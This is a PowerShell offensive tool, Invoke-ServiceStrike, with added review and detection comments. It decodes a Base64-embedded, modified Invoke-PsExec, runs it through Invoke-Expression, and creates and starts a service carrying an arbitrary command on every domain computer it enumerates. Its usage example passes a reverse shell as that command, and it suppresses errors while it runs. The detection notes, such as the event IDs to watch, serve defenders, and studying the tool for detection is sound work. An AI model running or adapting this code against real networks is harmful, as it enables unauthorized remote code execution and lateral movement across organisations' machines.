<#
Invoke-ServiceStrike.ps1
Author: @polair
License: BSD 3-Clause
#>
########################################################
#
# This script includes and executes a modified version of Invoke-PsExec originally published under the BSD 3-Clause License.
# Author: Will Schroeder (@harmj0y)
# https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1
#
########################################################
function Invoke-ServiceStrike {
<#
.SYNOPSIS
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.
.DESCRIPTION
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.

The function decodes an embedded Base64 copy of a modified Invoke-PsExec, loads it with Invoke-Expression inside each runspace, and calls it once per target computer. Targets are processed in parallel through a runspace pool; results are collected sequentially and only string output is printed.
.PARAMETER ComputerName
IP address or hostname of the remote system. When omitted (and no $Computerfile variable is in scope), the function queries the directory for computer accounts and targets every returned dnshostname except the local host.
.PARAMETER Command
Command string passed unchanged to the -Command parameter of the embedded Invoke-PsExec.
.PARAMETER ServiceName
Service name passed to the embedded Invoke-PsExec. Defaults to "TestSVC".
.PARAMETER timeout
Maximum time to wait for runspaces (max = timeout * number of machines). The value is handed to WaitHandle.WaitOne, so it is presumably in milliseconds.
.PARAMETER threads
Maximum number of runspaces to run in parallel.
.EXAMPLE
Import-Module .\Invoke-ServiceStrike.ps1
Invoke-ServiceStrike -Command <revShell> [-timeout 45000 -threads 5 -ComputerName '192.168.1.103' -ServiceName test]
.NOTES
Review and detection notes:
- The code that actually talks to the Service Control Manager lives in the Base64 blob and is not readable in this file; it must be decoded to be reviewed. PowerShell script block logging (event 4104) records the decoded text when Invoke-Expression runs it.
- Per the synopsis, each target has a service created and started. On the target this normally surfaces as Service Control Manager event 7045 and, with the relevant auditing enabled, Security event 4697.
- The default service name "TestSVC" is caller-controlled and is therefore only a weak indicator.
- $ErrorActionPreference is set to "silentlycontinue" for the whole run, so failures are not reported to the operator.
#>
[CmdletBinding()]
Param (
# Optional single target; also accepted from the pipeline.
[Parameter(Mandatory = $false, ValueFromPipeLine = $true, ValueFromPipelineByPropertyName = $true)]
[String]
$ComputerName,
# Required; forwarded verbatim to Invoke-PsExec -Command.
[Parameter(Mandatory = $True)]
[String]
$Command,
# Name given to the service on the target.
[String]
$ServiceName = "TestSVC",
# NOTE(review): declared as [string] although it is used as a numeric wait
# duration below; PowerShell presumably coerces it at the WaitOne call - confirm.
[Parameter(Mandatory = $false)]
[string]
$timeout = 35000,
# Upper bound of the runspace pool.
[Parameter(Mandatory = $false)]
[int]
$threads = 5
)
Begin {
# Save the caller's error preference so End can restore it, then silence
# errors for the duration of the run.
$ErrorActionPreference2 = "$ErrorActionPreference"
$ErrorActionPreference = "silentlycontinue"
# Embedded payload: Base64 text of the modified Invoke-PsExec named in the file
# header. Its content is opaque here and has to be decoded for review.
$invoke_psexec = @'
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
'@
# Decode the blob to UTF-8 source text; it is executed later via Invoke-Expression.
$bytes = [Convert]::FromBase64String($invoke_psexec)
$invoke_psexecDec = [System.Text.Encoding]::UTF8.GetString($bytes)
}
Process {
# Target selection.
# NOTE(review): $Computerfile is not declared in the Param block above, so this
# branch is only taken if a variable of that name exists in an enclosing scope.
if ($Computerfile) {
$Computers = Get-Content $Computerfile
}
elseif ($ComputerName) {
$Computers = $ComputerName
}
else {
# No target given: enumerate computer accounts from the directory.
# sAMAccountType 805306369 (0x30000001) is the machine-account type.
# The DirectoryEntry is created without arguments, so it presumably binds to
# the current user's domain - confirm. The local host's FQDN is excluded.
$localFQDN = [System.Net.Dns]::GetHostEntry($env:COMPUTERNAME).HostName
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher
$DirectorySearcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$DirectorySearcher.Filter = "(&(sAMAccountType=805306369))"
$Computers = $DirectorySearcher.FindAll() | ForEach-Object {
$hostname = $_.properties["dnshostname"]
if ($hostname -and $hostname -ne $localFQDN) {
$hostname
}
}
}
# Pool of 1..$threads runspaces shared by all per-target jobs.
# NOTE(review): the pool is opened here but never closed or disposed in this function.
$runspacePool = [runspacefactory]::CreateRunspacePool(1, $threads)
$runspacePool.Open()
$runspaces = @()
# The loop variable reuses the name of the $ComputerName parameter and overwrites it.
foreach ($ComputerName in $Computers) {
"`n[*] Trying $ComputerName..."
$ps = [powershell]::Create()
$ps.RunspacePool = $runspacePool
# Each job first defines Invoke-PsExec by running the decoded text through
# Invoke-Expression, then calls it for this target. The return value of the
# AddScript/AddArgument chain is discarded with "> $null".
$ps.AddScript({
param($ComputerName, $Command, $ServiceName, $invoke_psexecDec)
Invoke-Expression $invoke_psexecDec
Invoke-PsExec -ComputerName $ComputerName -Command $Command -ServiceName $ServiceName
}).AddArgument($ComputerName).AddArgument($Command).AddArgument($ServiceName).AddArgument($invoke_psexecDec) > $null
# Start the job asynchronously and keep the handle for collection below.
$runspaces += [PSCustomObject]@{
PowerShell = $ps
Handle = $ps.BeginInvoke()
}
}
# Collect results in submission order, waiting up to $timeout per job.
foreach ($rs in $runspaces) {
#Write-Host " Time started on $($rs.PowerShell.InstanceId)"
$handle = $rs.Handle.AsyncWaitHandle
if ($handle.WaitOne($timeout)) {
#Write-Host "Time over on $($rs.PowerShell.InstanceId)"
$output = $rs.PowerShell.EndInvoke($rs.Handle)
# Only string output is shown; any other object type is dropped silently.
foreach ($line in $output) {
if ($line -is [string]) {
Write-Host $line
}
}
}
else {
#Write-Host " Timeout on $($rs.PowerShell.InstanceId)"
# NOTE(review): "continue" skips the Dispose() call below, so a job that timed
# out is neither stopped nor disposed by this function.
continue
}
$rs.PowerShell.Dispose()
}
}
End {
# Restore the caller's error preference saved in Begin; the empty catch
# swallows any failure while doing so.
try {
$ErrorActionPreference = $ErrorActionPreference2
#Write-Host "Completed"
}
catch {
}
}
}